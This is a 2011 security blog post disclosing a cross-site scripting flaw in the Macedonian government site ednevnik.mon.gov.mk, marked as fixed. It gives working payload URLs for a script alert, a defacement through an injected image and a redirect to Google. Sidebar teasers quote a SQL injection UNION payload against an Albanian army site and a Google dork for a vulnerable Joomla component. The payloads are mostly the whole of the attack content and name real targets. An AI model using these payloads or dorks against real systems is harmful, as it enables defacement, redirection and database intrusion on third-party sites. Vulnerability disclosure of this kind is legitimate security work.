Follow me Subscribe RSS

Zer0-0ne

“I have no special talents. I am only passionately curious.”A.Einstein

Home
Computer Search Engine
Web-Sniffer
Web-Tools
Binary Translator
Malware Scanner
XSSdb

Thursday, February 10, 2011

ednevnik.mon.gov.mk XSS vulnerable

0

in

Ednevnik.mon.gov.mk is vulnerable to xss cross site scripting xss.

Poc:
http://ednevnik.mon.gov.mk/?s=%22/%3E%3Cscript%3Ealert(/xss/)%3C/script%3E

Non-persisten defacment:
tp://ednevnik.mon.gov.mk/?s=%3Cimg%20src=%22http://i54.tinypic.com/1zf39yv.jpg%22/%22%3E

Url redrection (google):
http://ednevnik.mon.gov.mk/?s=%3Cimg%20src=%22%20%22%20onError=%22document.location='http://google.com'%22%3E

Found by: darknessn1k0!a
Status: Fixed

Email This BlogThis! Share to X Share to Facebook

Newer Post Older Post Home

0 comments:

Post a Comment

About Me

За Zer0-0ne: Блог за истражување и развој на информациска безбедност, кој е наменет за постирање на најнови ранливости и слабости. Founder darknessn1k0!4

View my complete profile

Blog Archive

Popular Posts

ednevnik.mon.gov.mk XSS vulnerable

Ednevnik.mon.gov.mk is vulnerable to xss cross site scripting xss. Poc: http://ednevnik.mon.gov.mk/?s=%22/%3E%3Cscript%3Ealert(/xss/)%3C/scr...
Joomla Component (com_eventList) Remote Blind SQL Injection Vulnerability

# Title : Joomla Component EventList # Dork : intext:"Event List 0.8 Alpha by schlu.net " # DorkEx : http://www.google.com.tr/sea...
Alcatel-mobilephones XSS Vulnerable

#Title: Alcatel-mobilephones XSS Vulnerable #Risk: (4/5) #Release Date: 30.09.2010 #Vulnerability discovered by: darknessn1k0!a http://www.a...
gov.mk Vulnerability sites

Се решив да ги проверам нашите македонски владни сајтови колку се безбедни и ранливи, па бидејки веке подолго време никој ништо не превзема ...
gs.mil.al (Army Forces of Albania) SQL INJECTION VULNERABILITY

POC: http://www.gs.mil.al/galeri_info.php?idr=&ida=-1+union+select+1,2,3,@@version,5,6-- http://www.gs.mil.al/galeri_info.php?idr=&i...

Categories

M (1)

page hit counter

Featured Posts

Copyright © 2011 Zer0-0ne | Powered by Blogger

Design by ThemeShift | Bloggerized by Lasantha - Free Blogger Templates | Best Web Hosting